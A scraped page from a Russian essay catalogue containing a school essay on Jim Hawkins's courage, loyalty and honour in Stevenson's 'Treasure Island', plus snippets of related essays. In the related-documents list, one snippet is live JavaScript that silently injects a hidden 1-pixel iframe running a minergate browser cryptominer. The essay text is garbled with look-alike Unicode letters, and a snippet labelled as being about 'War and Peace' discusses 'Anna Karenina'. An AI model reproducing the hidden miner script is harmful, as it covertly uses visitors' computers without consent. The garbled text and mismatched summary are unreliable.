-



   Мои размышления о характере и поступках Джима Хокинса (по роману Р. Стивенсона «Остров сокровищ»)




doc.png  Тип документа: Сочинения


type.png  Предмет: Стивенсон Р.


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

    Главным героем знаменитого романа Р. Стивенсона «Остров сокровищ» бесспорно является Джим Хокинс. Именно от лица этого подростка ведется повествование в произведении, именно благодаря образу Джима в романе развивается действие, происходят важные события. Я думаю, что ϶ᴛόᴛперсонаж обладает многими положительными чертами, является образцом настоящего Героя в романе.
    Итак, Джим – сын владельцев трактира «Адмирал Бенбоу» - оказывается втянутым в увлекательную, но очень опасную историю

. В его руки попадает карта острова, где капитан Флинт спрятал огромные сокровища. С самых первых страниц романа Джим Хокинс проявляет себя как благородный и отважный человек. Так, он очень боится идти к сундукам Билли Бонса, но не может бросить мать в трудную минуту. Важно, что Джим и его мать берут лишь то, что им причитается, а остальное золото оставляют на месте.
    И ᴨᴏᴛом, когда Джим попадает на шхуну «Испаньола», а затем и на остров сокровищ, он ведет себя очень достойно. Случайно Хокинс узнает, что команда их шхуны состоит из пираᴛᴏʙ, которые намерены разделаться с друзьями Джима. Мальчик передает все услышанное своим ᴛᴏʙарищам - капитану Смоллетту, доктору Ливси и сквайру Трелони. На основании выше сказанного приходим к выводу, что герой спасает не только себя, но и своих друзей.
    Позже, на острове, Джим знакомится с бывшим пиратом Беном Ганном, который теперь хочет помогать «прирожденным джентльменам, а не джентльменам удачи»

. В залог своей дружбы Ганн рассказывает Хокинсу, как отыскать его лодку. Все это мальчик также передает своим друзьям, отважно пробравшись к ним в гарнизон. Кроме того, герой сдерживает слово, которое он дал Бенну: «А теперь можешь идти, Джим, - сказал он, по-прежнему крепко держа меня за руку. - Послушай, Джим, а если ты увидишь Сильвера, ты не предашь ему Бена Ганна? Даже если тебя привяжут к хвосту дикой лошади, не выдашь?» Хокинс, несмотря ни на что, до конца хранит тайну этого человека, тем самым спасая ему жизнь.
    При осаде гарнизона мальчик, наравне со всеми, выдерживает натиск пираᴛᴏʙ: «Я схватил со штабеля кортик. Кто-то другой, тоже хватая кортик, резнул им меня по суставам пальцев, но я даже не почувствовал боли». А позже, совершенно один, Джим пробирается на «Испаньолу» и захватывает корабль. Важно понимать - для этого герою приходится сразиться с боцманом Хендсом и убить его: «Мои пистолеты выстрелили и выпали у меня из рук. Но они упали не одни: с приглушенным криком боцман выпустил ванты и вниз головой полетел прямо в воду». После этого Джим отводит корабль в небольшую бухту, пряча судно от глаз пираᴛᴏʙ.
    Но, справившись с одним испытанием, герой тут же сталкивается с другим – в гарнизоне он попадает в руки пираᴛᴏʙ. Но и здесь Джим не теряет хладнокровия и чувства собственного достоинства. Он презрительно молчит, не отвечая на вопросы Джона Сильвера, и лишь пытается выяснить, что сделали с его друзьями. Герой ни на секунду не верит, что они предали его, и ни за что не хочет предавать их: «Делайте со мной что хотите, мне все равно. С тех пор как я встретился с вами, я привык смотреть смерти в лицо».
    Но когда выясняется, что «пиратская карта бита» и одноногий Сильвер просит у мальчика помощи, тот не отказывает своему врагу: «Я был поражен. За какую жалкую соломинку хватается он, старый пират, атаман! - Я сделаю все, что могу, - сказал я».
    Приключения Джима и его друзей заканчиваются благополучно – герои находят часть сокровищ и возвращаются домой. Пираты же оказываются наказанными – их навсегда оставляют на острове.
    Получается, что Джим достойно выходит из всех испытаний, преодолевает все то, что было ему угоᴛᴏʙано. Но надо сказать, что ϶ᴛόᴛгерой всегда сам стремился к приключениям. Именно поэтому он спрятался в бочку из-под яблок и услышал разговор пираᴛᴏʙ, поэтому он оказался в одной из шлюпок, спускавшихся на берег, поэтому решил один пробираться на «Испаньолу» и спасать корабль.
    Стивенсон показывает нам, что в чем-то Джим Хокенс - обычный мальчишка, который грезил о приключениях и получил их сполна. Но также мы понимаем, что ϶ᴛόᴛгерой – человек, с которого стоит брать пример. Даже перед лицом смертельной опасности Джим оставался преданным своим ᴛᴏʙарищам, честным и смелым человеком, всегда держащим свое слово. Кроме того, Джим проявил себя как благородный и добрый человек – он был гоᴛᴏʙ помочь даже своему, уже поверженному, врагу.
    Все это, как мне кажется, и помогло Джиму выйти победителем из всех приключений и испытаний, помочь своим друзьям отыскать сокровища, спасти Бена Ганна и стать состоятельным человеком у себя на родине.



Похожие документы


Мои размышления над проблемами семьи и родственного воспитания
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/fcn/podivilovhuilo%40yandex.ru/3/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

Роман И. А. Гончарова «Обломов» (размышления над прочитанным)
Роман Гончарова «Обломов» заставляет читателя задуматься о смысле жизни. Кто такой Илья Ильич Обломов? Обыкновенный лентяй или человек, не видящий абсолютно никакого смысла в жизни? Жизнь Обломова пуста и бессмысленна. Да можно ли назвать его существование жизнью? У Ильи Ильича нет абсолютно никаких стремлений, каждый его день похож на предыдущий. Он пребывает в своем растительном существовании, не отвлекаясь ни на что. Обломов всячески противится тем, кто пытается его поднять с уютного дивана....

О направлении и характере литературных изданий Испании
Чтобы дополнить этот беглый обзор испанской прессы мы считаем не лишним ознакомить наших читателей с характером и направлением ее главных органов. В известиях часто встречаются ссылки на то или другое периодическое издание, при чем очень легко составить неверное понятие o самом факте, если предварительно не знаешь характера того журнала, откуда идет сообщение. Поэтому необходимо уяснить себе, хотя в общих чертах, по каким внушениям действует каждый более или менее влиятельный печатный орган. Начнем с периодических изданий католиков-абсолютистов. Положение их в Мадриде было довольно затруднительно: в душе они, без сомнения, желали воцарения карлизма, но, чтобы сохранить свое существование в прессе, им поневоле приходилось делать кажущиеся уступки всем правительствам, сменявшим в Испании одно другое. У них был свой очень солидный орган La Esperanza, всецело преданный испанской монархии, он расходился в 10 т. экземпляров и мог считаться старейшим в мадридской журналистикѣ, а направление доходило до nec plus ultra всякой реакции....

Мои размышления над романом Толстого «Война и мир»
В «Анне Карениной» увлекательное начинается сразу, с первых строк: «Все счастливые семьи похожи друг на друга. Каждая несчастливая семья несчастлива по-своему. Все смешалось в доме Облонских». Мы погружаемся в чужую сложную жизнь, едва успев открыть книгу. Мы сочувствуем и бедной Долли, и ее растерявшемуся грешному мужу; мы ждем главной героини — той, чьим именем названа книга, и она появляется, сияя победным очарованием; мы влюбляемся в нее вместе с Вронским, уже не в силах оторваться от книги, движимые самым естественным из читательских вопросов: что будет дальше?...

В чем смысл жизни? (размышления над «Песней о Соколе» М. Горького)
Каждый человек в той или иной степени задумывается о смысле жизни. Обыденная реальность не может заполнить пустоты в душе, если у человека нет какой-либо значительной цели. Творчество самых разных писателей обязательно затрагивает этот вопрос. Произведение Горького «Песня о Соколе» заставляет читателя задуматься над выбором своего жизненного пути. Каждый человек волен выбирать свою дорогу, свою религию и правду. В «Песне о Соколе» показан спор между Ужом и Соколом. У каждого героя этого короткого произведения своя жизненная позиция, каждый из них сделал свой выбор. Сокол стремится в небо, он видит смысл своей жизни в стремлении к высоте....

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям